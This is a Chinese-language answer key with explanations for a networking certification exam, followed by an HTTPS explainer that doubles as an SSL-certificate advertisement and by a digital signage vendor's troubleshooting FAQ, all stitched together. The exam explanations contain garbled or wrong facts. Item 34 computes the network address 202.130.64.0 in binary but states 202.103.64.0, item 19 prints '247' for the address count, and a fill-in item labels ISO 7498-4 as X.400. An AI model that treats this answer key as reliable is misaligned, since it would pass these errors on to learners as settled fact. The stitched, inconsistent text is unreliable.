16.解析：资源预留协议（RSVP）支持多媒体QoS，其根据应用的需求在各个交换结点预留资源，从而保证沿着这条通路传输的数据流能够满足QoS的要求；区分服务（DiffServ）是根据每一类服务进行控制，利用IP分组头对数据的服务级别进行标识；多协议标识交换（MPLS）技术的提出主要是为了更好地将IP协议与ATM高速交换技术结合起来，其核心是标记交换，MPLS标记是一个用于数据分组交换的、短的、固定长度的转发标识符。所以A、B、C选项说法都正确，D选项中CDMA（码分多址）是一种移动通信技术，故D选项不正确，答案选D。

17.解析：10Gbps Ethernet的数据速率高达10Gbps，因此10Gbps Ethernet的传输介质不再使用铜线和双绞线，而只使用光纤。它使用长距离的光收发器和单模光纤接口，以便能在广域网和城域网的范围内工作。答案选B。

18.解析：局域网参考模型只对应OSI参考模型的数据链路层和物理层，它将数据链路层划分为逻辑链路控制LLC（Logical Link Control）子层和介质访问控制MAC（Mediea Access Control）子层。答案选A。

19.解析：典型的Ethernet物理地址长度为48位（6个字节），允许分配的Ethernet物理地址应该有247个，这个物理地址数量可以保证全球所有可能的Ethernet物理地址的需求。答案选C。

20.解析：100Base-T标准采用了介质独立接口MII（Media Indepandent Interface），将MAC子层与物理层分隔开，使得物理层在实现100Mbps速率时所使用的传输介质和信号编码的变化不会影响到MAC子层。答案选A。

21.解析：10Gbps Ethernet只工作在全双工方式，因此不存在争用的问题，10Gbps Ethernet的传输距离不受冲突检测的限制。答案选C。

22.解析：局域网交换机利用“端口/MAC地址映射表”进行数据交换，改表的建立和维护十分重要，交换机利用“地址学习”方法来动态建立和维护端口/MAC地址映射表。答案选A。

23.解析：网卡也称为网络适配器或者网络接口卡（NIC，Network Interface Card），它是构成网络的基本部件之一，一方面连接局域网计算机，另一方面连接局域网的传输介质。网卡的分类方法有：（1）按照网卡支持的计算机种类主要分为：标准以太网与PCMCIA网卡；（2）按照网卡支持的传输速率分为：普通10Mbps网卡、高速100Mbps网卡、10/100Mbps自适应网卡、1000Mbps网卡；（3）按照网卡支持的传输介质类型分为：双绞线网卡、粗缆网卡、细缆网卡、光纤网卡。网卡没有按帧长度分类的方法，答案选D。

24.解析：交换机端口有半双工和全双工之分，对于1000Mbps的端口，半双工端口带宽为1000Mbps，全双工端口为2000Mbps，因此48个10/100Mbps的全双工端口和2个1000Mbps的全双工端口总带宽为：48×100Mbps×2 + 2×1000Mbps×2 = 13600Mbps = 13.6Gbps。答案选C。

25.解析：在建筑物综合布线系统中，主要采用高性能的非屏蔽双绞线与光纤，能够支持高达100Mbps的传输速率，甚至更高。答案选B。

26.解析：Windows和OS/2是多任务操作系统，它们允许多个程序同时运行；Windows和OS/2的内核含有分时器，它在激活的应用程序中分配处理器时间；Windows支持多种文件系统，包括FAT、FAT32和NTFS；因此A、B、C选项都正确，D选项中，Windows不需要采用扩展内存技术错误，Windows和OS/2的内存管理复杂，采用了扩展内存技术，如果系统不能提供足够的实内存来满足一个应用程序的需要，虚拟内存管理程序就会介入来弥补不足。答案选D。

27.解析：网络操作系统经历了从对等结构向非对等结构演变的过程；在对等结构网络操作系统中，所有的联网结点地位平等，任意两个节点之间可以直接实现通信；安装在每个网络节点的操作系统软件相同每台联网的计算机都可以分为前台方式和后台方式，前台为本地用户提供服务，后台为其他结点的网络用户提供服务，前台服务和后台服务的软件不可互换。答案选B。

28.解析：活动目录是Window 2000 Server最重要的新功能之一，它存储有关网络对象的信息，例如用户、组、计算机、共享资源、打印服务等，并使管理员和用户可以方便地查找和使用这些网络信息；通过Window 2000 Server的活动目录，用户可以对用户与计算机、域、信任关系，及站点与服务进行管理，活动目录有可扩展性和可调整性；活动目录把域详细划分为组织单元，组织单元是一个逻辑单位，它是域中一些用户和组、文件与打印服务等资源对象的集合；组织单元又可再划分为下级组织单元，下级组织单元能够继承父单元的访问许可权。答案选C。

29.解析：NetWare网络操作系统由Novell公司开发研发的网络操作系统，NetWare的网络安全机制主要解决以下几个问题：限制非授权用户注册网络并访问网络文件；防止用户查看他不应该查看的网络文件；保护应用程序不被复制、删除、修改或被窃取；防止用户因为误操作而删除或修改不应该修改的重要文件。因此B、C、D选项均正确，NetWare的系统容错技术主要有：三级容错机制、事物跟踪系统和UPS监控，因此A选项错误，答案选A。

30.解析：Linux操作系统是一个免费的软件包，可将普通的PC变成装有Unix 系统的工作站；Linux虽然和Unix操作系统类似，但并不是Unix 的变种，是完全重新编码的操作系统，Linux从开发初期，内核代码就是仿Unix的，几乎所有Unix的工具与外壳都可以运行在Linux上；Red Hat Linux支持Intel、Alpha和Sparc平台和大多数应用软件，支持C++编程语言。答案选B。

31.解析：1969年贝尔实验室的人员编写了Unix的第一个版本V1，1981年ATT发表了Unix的System3，同年加州伯克利分校在VXA及其上推出了Unix的伯克利版本，即常说的Unix BSD版。目前各大公司的主要版本有：IBM公司的AIX系统、Sun公司的Solaris系统及HP公司的HP-UX系统。答案选A。

32.解析：IP提供尽力而为的服务，IP并不随意丢弃数据报，只有当系统资源用尽、接收数据错误或网络出现故障等状态下，才不得不丢弃报文；传输控制协议（TCP）和用户数据报协议（UDP）运行于传输层，TCP提供可靠的、面向连接的、全双工的数据流传输服务，而UDP则提供不可靠的无连接的传输服务。TCP/IP是一个协议集，可用于多种操作系统。答案选C。

33.解析：路由器在因特网中起到重要的作用，它连接两个或者多个物理网络，负责将重一个网络接收来的IP数据报，经过路由选择，转发到一个合适的网络中。答案选B。

34.解析：在实际应用中，需要对IP地址中的主机号部分进行再次划分，将其划分成子网号和主机号两部分。再次划分后的IP的网络号部分和主机号部分用子网屏蔽码（也称子网掩码）来区分，对于IP地址中的网络号部分在子网屏蔽码中用“1”表示，对于IP地址中主机号部分在子网屏蔽码中用“0”表示。在求网络地址时，先计算出IP地址和子网屏蔽码对应的二进制数值，然后两者进行“与”运算即得到网络地址。在本题中，255.255.192.0的二进制为：11111111. 11111111. 11000000. 00000000，主机的IP地址202.130.82.97对应的二进制为：11001010.10000010.01010010.01100001，两二进制数相“与”得11001010.10000010. 01000000. 00000000，即为主机所属网络的网络号，即202.103.64.0。答案选C。

35.解析：由于利用IP进行互联的各个物理网络所能处理的最大报文长度有可能不同，所以IP报文在传输和投递的过程中有可能被分片，从而保证数据不会超过物理网络能传输的最大报文长度。答案选D。

36.解析：一个路由表通常包含许多（N，R）对序偶，其中N 指目的网络的IP地址，R是网络N路径上的“下一个”路由器的IP地址。答案选A。

37.解析：因特网中域名结构由TCP/IP协议集的域名系统（DNS，Domain Name System）进行定义。DNS把因特网划分成多个顶级域，并规定了国际通用域名，常见的顶级域如表4所示。

表4 常见的顶级域名

顶级域名

分配对象

顶级域名

分配对象

com

商业组织

net

主要网络支持机构

edu

教育机构

org

上述以外组织

gov

政府部门

int

国际组织

mil

军事部门

国家代码，如cn、us等

各个国家

答案选B。

38.解析：请求域名解析的软件至少知道如何访问一个域名服务器，而每个域名服务器至少知道根服务器地址及其父节点服务器，这样可以一直查找下去直到查到对应主机名的IP地址。在本题中，用户级计算机首先需要知道第一个域名服务器地址，即第一个域名服务器的IP地址，而选项当中只有D选项是正确的域名服务器IP地址，因此答案选D。

39.解析：电子邮件应用程序在向电子邮件服务器发送邮件的时候使用简单邮件传输协议（SMTP，Simple Mail Tansfer Protocol），在读取邮件时使用POP3（Post Office Protocol）协议或者IMAP（Interactive Mail Access Protocol）协议。答案选C。

40.解析：Telnet是TCP/IP协议中重要的协议，它为引入网络虚拟终端（NVT）提供了一种标准的键盘定义，用于屏蔽不同计算机系统对键盘输入的差异性，解决了不同计算机系统之间互操作问题。答案选A。

41.解析：因特网中每台主机至少有一个IP地址，而且这个IP地址必须是全网唯一的。在因特网允许一台主机有两个或多个IP地址，如果一台主机有两个或多个IP地址，则该主机可能会属于两个或多个逻辑网络；在因特网中允许同一主机有多个名字，同时允许多个主机对应一个IP地址。答案选B。

42.解析：在使用因特网进行电子商务活动中，通常可使用安全用安全通道访问Web站点，以避免第三方偷看或篡改，安全通道使用SSL（安全套接层）技术。答案选C。

43.解析：配置管理的内容分为对设备的管理和对设备的连接关系的管理两部分，对设备的管理包括：识别网络中的各种设备，确定设备的地理位置、名称和有关细节，记录并维护社别参数表；用适当的软件设置参数值和配置设备功能；初始化、起动和关闭网络或网络设备；配置管理能够利用统一的界面对设备进行配置，生成并维护网络设备清单，网络设备清单应该被保密，如果被有恶意的人得到可能会在许多方面对网络造成危害。答案选C。

44.解析：SNMP位于ISO/OSI模型的应用层，遵循ISO的管理 - 代理者的网络管理模型。答案选D。

45.解析：C2级称为受控的访问控制，包括所有的C1级特征，C2级具有限制用户执行某些命令或访问某些文件的权限，还加入了身份认证级别。能够达到C2级的操作系统有Unix、XENIX、NetWare 3.x或更高版本以及Windows NT等。答案选C。

46.解析：置换密码中，每个或每组字母由另一个或另一组伪装字母所替换，最古老的置换密码是凯撒密码，它的密钥空间只有26个字母，最多尝试25次即可知道密钥。答案选C。

47.解析：RC5是常规加密算法，常用的对称加密算法特点及安全性如表5所示。

表5 常用的对称加密算法

算法

特点

安全性

DES

最常用的对称加密算法，几乎是事实上的国际标准

DES本身不再安全，但其改进算法的安全性相当强

TDEA

三重DEA，密钥长度168比特

缺点是软件实现相对缓慢

RC5

分组长度和密钥长度都是可变的

可以在速度和安全性间进行折中

IDEA

以64位的明文块进行分组，密钥长度为128位，采用异或、模加、模乘三种运算

容易用软硬件实现，被认为是当今公开算法的最好的对称分组密码算法

由表可知答案选D。

48.解析：在数字签名认证过程中，数字签名使用的是公钥密码体制中的认证模型，发送者使用自己的私钥加密信息，接收者使用发送者的公钥解密信息。答案选B。

49.解析：公钥体制的安全基础主要是数学中的难题问题，流行的有两大类的：一类基于大整数因子分解问题，如RSA体制；另一类基于离散对数问题，如Elgamal体制、椭圆曲线密码体制等。答案选D。

50.解析：数字签名可以利用公钥密码体制、对称密码体制和公证系统实现。最常见的实现方法是建立在公钥密码体制和单向安全散列算法的组合基础之上；常用的公钥数字签名算法有RSA算法和数字签名标准算法（DSS）；数字签名可以进行验证，但数字签名没有提供消息内容的机密性，答案选C。

51.解析：特洛伊木马是攻击者在正常的软件中隐藏一段用于其他目的的程序，这段隐藏的程序段通常以安全攻击作为其最终目标。在本题中，特洛伊病毒被植入到Word中，用户编辑Word时，病毒就会把文档传送到另一台FTP服务器，植入特洛伊木马的黑客就可以看到该用户的文档，因此Word被植入了特洛伊木马。陷门是某个子系统或某个文件系统中设置特定的“机关”，使得在提供特定的输入数据时，允许违反安全策略。答案选B。

52.解析：两网对接时，可利用硬件防火墙作为设备实现地址转换（NAT）、地址映射（MAP）、网络隔离（DMZ）及存取安全控制，消除传统软件防火墙的瓶颈问题；防火墙的优点：保护脆弱的服务、控制对系统的访问、集中的安全管理、增强的保密性、记录和统计网络利用数据以及非法使用数据、策略执行。答案选C。

53.解析：电子数据处理EDP是实现EDI的基础和必要条件；EDI又称为“无纸贸易”；EDI数据自动地投递和传输处理而不需要人工介入，应用程序对它自动响应。答案选B。

54.解析：证书是由CA安全认证中心发放的，具有权威机构的签名，所以它可以用来向系统中的其他实体证明自己的身份；每份证书都携带着证书持有者的公开密钥，所以可以向接收者证实某个实体对公开密钥的拥有，同时起着分发公开密钥的作用；证书的有效性可以通过相关的信任签名来验证，证书包括版本、序号、签名算法、颁发者、有效期、主体、主体公钥信息等字段，不携带持有者的基本信息。答案选C。

55.解析：电子现金也称数字现金，具有用途广泛、使用灵活、匿名型、快捷简单、无须直接与银行连接便可使用等特点，既可以存储在智能IC卡上，也可以以数字形式存储在现金文件中。答案选C。

56.解析：电子政务的发展大致经历面向数据处理、面向信息处理和面向知识处理三个阶段，面向数据处理的电子政务主要集中在1995年以前，以政府办公网的办公自动化和管理系统的建设为主要特征。答案选A。

57.解析：信息安全基础设施子层以公钥基础设施（PKI）、授权管理基础设施（PMI）、可信时间戳服务系统和安全保密是管理系统等为重点。答案选B。

58.解析：ATM是以信元为基础的一组分组和复用技术，是一种为了多种业务涉及的通用的面向连接的传输模式。在ATM的传输模式中，信息被组织成“信元”，来自某用户信息的各个信元不需要周期性地出现。而实际上，信元中每个位常常是同步定时发送的，即通常所说的“同步串行通信”。答案选B。

59.解析：xDSL技术安上行和下行的速率是否相同可分为对称型和非对称型两种，对称型的有：HDSL、SDSL、IDSL，非对称型的有ADSL、VDSL、RADSL。答案选C。

60.解析：EDGE（数据速率增强型GSM）接入技术是一种提高GPRS信道编码效率的高速移动数据标准，数据传输速率最高达384 kbps。答案选C。

二、填空题：

1.解析：计算机辅助工程包括计算机辅助设计CAD，计算机辅助制造CAM，计算机辅助工程CAE，计算机辅助教学CAI，计算机辅助测试CAT等。答案为：CAE

2.解析：MPEG是ISO/IEC委员会的第11172号标准草案，包括MPEG视频、MPEG音频和MPEG系统三部分。答案：视频

3.解析：目前城域网的建设方案具有几个共同点：传输介质采用光纤，交换结点采用基于IP的高速路由交换机ATM交换机，在体系结构上采用核心层、业务汇集层与接入层的三层模式，以适应各种业务需求、不同协议与不同类型用户的接入需要。答案：接入层

4.解析：计算机网络拓扑是通过网中结点与通信线路之间的几何关系表示网络结构，反映出网络各实体间的结构关系。答案：几何关系

5.解析：在层次结构的网络中，各层之间相互独立，高层并不需要知道低层是如何实现的，仅需知道该层通过层间的接口所提供的服务，上层通过接口使用低层提供的服务。答案：接口

6.解析：IEEE 802.1标准包括局域网体系结构、网络互连、以及网络管理与性能测试。答案：互连

7.解析：在Ethernet中，发送结点以“广播”方式把数据通过作为公用传输介质的总线发送出去，总线上所有的结点都能“收听”到发送结点发送的数据，为了避免冲突，CSMA/CD的发送流程可以概括为：先听后发，边听边发，冲突停止，随机延迟后重发。答案：随机

8.解析：无线局域网采用的扩频方法主要有调频扩频和直接序列扩频。答案：直接序列

9.解析：域模式的最大好处是单一网络登录能力，用户只需要在域中拥有一个账户，就可以在整个网络中漫游。答案：网络登录

10.解析：1969年ATT公司贝尔实验室的人员编写了Unix的第一个版本V1。答案：贝尔

11．解析：一个路由表通常包含许多（N，R）对序偶，其中N 指目的网络的IP地址，R是网络N路径上的“下一个”路由器的IP地址。本题中，目的IP地址为20.0.0.1，属于A类网络地址，其网络地址为20.0.0.0，因此路由器收到该IP数据包按照路由表的第一个（N，R）对序偶下一路由选择为“直接投递”，即直接投递给接收主机，因此投递的IP地址为：20.0.0.1。答案：20.0.0.1

12.解析：WWW服务也称Web服务，WWW服务采用客户机/服务器模式，它以超文本标记语言HTML和超文本传输协议HTTP为基础，为用户提供界面一致的信息浏览系统。答案：WWW或Web

13.解析：当用户访问提供匿名服务的FTP服务器时，通常用“anonymous”作为账号，用“gust”作为口令。答案：anonymous

14.解析：故障管理的步骤包括：发现故障、判断故障症状、隔离故障、修复故障、记录故障的检修过程及其结果。答案：修复

15.解析：网络安全的基本要素是实现信息的机密性、完整性、可用性和合法性。答案：合法性

16.解析：CMIS/CMIP是ISO定义的网络管理协议，它的制定受到了政府和业界的支持。ISO首先在1989年颁布了ISO DIS 7498 – 4（X.400）文件，定义了网络管理的基本概念和总体框架。答案：ISO

17.解析：从网络高层协议的角度划分，攻击方法可以概括地分为两大类：服务攻击和非服务攻击。答案：非服务

18.解析：电子商务应用系统由CA安全认证系统、支付网关系统、业务应用系统、用户及终端系统组成。答案：用户及终端系统

19.解析：电子政务的网络基础设施包括因特网、公众服务业务网、非涉密办公网和涉密办公网几大部分。其中公众服务业务网、非涉密政府办公网和涉密政府办公网又称为政务内网。所有的网络系统以统一的安全电子政务平台为核心，共同组成一个有机的整体。答案 ：政务内网

20.解析：HFC在传输方式上可分为对称型和非对称型，对称型上下可能采用不同的调制方式，传输速率相同；非对称性上行信道一般采用QPSK调制方式，下行一般采用QPSK或QAM调制方式。答案：QPSK或QAM

全站HTTPS能带来怎样的优势？HTTPS原理是什么，如何加密

https作用：

1.保护隐私：所有信息都是加密传播，第三方无法窃听数据。如果使用HTTP明文传输数据的话，很可能被第三方劫持数据，那么所输入的密码或者其他个人资料都被暴露在他人面前，后果可想而知。

2.数据完整性：一旦第三方篡改了数据，接收方会知道数据经过了篡改，这样便保证了数据在传输过程中不被篡改 —— 数据的完整性。

3.身份认证：第三方不可能冒充身份参与通信，因为服务器配备了由证书颁发机构（Certificate

Authority，简称CA）颁发的安全证书，可以证实服务器的身份信息，防止第三方冒充身份。（也有少数情况下，通信需要客户端提供证书，例如银行系统，需要用户在登录的时候，插入银行提供给用户的USB，就是需要客户端提供证书，用来验证客户的身份信息。）

https原理：

http+ssl证书=https

像目前JoySSL品牌的ssl证书很优质，有着多种品牌证书，价格方面性价比也很高。JoySSL：https安全证书

DSS错误码1000528怎么可以解决？

创建的Project在编辑端可以预览，但是发布到播放器端播放时提示“页sequense时间页面为0，请为页添加时间序列”。 答：这是因为创建的page页面没有在sequense序列中添加时间序列。只需要鼠标按住page图标拖动到sequense中，然后在发布就不会出现错误了。 2、问：创建的Project在编辑端可以预览，但是发布的过程中提示“发布节目信息失败”错误。 答：这是因为没有开启服务器。鼠标双击DSS Server Daemon图标后将出现Srv Daemon的窗口，将窗口最小化后就完成了开启服务器的操作了。重新发布project时不会提示错误了。 3、问：播放器端登录时提示“连接错误”。 答：这是因为播放器登录界面中“服务器地址”填写不正确，检查服务器端实际的IP地址，然后重新手动输入后问题可以解决。 4、问：在Netmanager中创建的播放器图标灰色的。 答：这是因为播放器端的PlayerDaemon.exe程序没有启动。双击服务器端的PlayerDaemon.exe图标后，等待播放器登录过程，当播放器端登录界面提示“会话中”时，Netmanager界面中的播放器图标就不会为灰色。 5、问：节目发布完成之后不能显示PPT。 答：请检查PPT插件Microsoft PowerPoint Viewer 97是否安装，安装该插件可以解决不能显示PPT的问题。 6、问：播放一些视频文件的时候节目画面会出现卡屏。 答：此原因可能是由于ffdshow插件错误导致，卸载ffdshow插件并进行重新安装问题可以解决。 7、问:基金程序不能正常显示。 答:请检查播放器网络是否通畅，检查播放器能否正常的访问服务器，对应的基金网页地址能否正常访问（例如：工商银行内部需要能够访问到），以上3个条件缺一不可。 如以上设置都没有问题，请重新安装FLASH插件，问题解决。 8、问：播放器端连接不上服务器。 答：请检查播放器网络是否通畅，检查播放器连接服务器的9090,9091,6000，这3个是否通畅，检查播放器服务器地址是否填写正确，播放端的登入名及密码是否正确。 9、问：机器启动后能看见开机画面但是进入系统就黑屏。 答：这个原因全部出现在WS30上是由于机器识别输出设备错误造成的，请接上键盘重启机器等系统登入黑屏后，按键盘数字键开关检查键盘是否可以使用，确定可以使用，按3下Ctrl+Alt+F1组合键进行输出设备的切换。 10、问：机器能启动但是黑屏 答：检查VGA线是否有松动及VGA线是否已坏。 北京鸿合盛视数字媒体技术有限公司DSS系统售后培训文档 - 0 -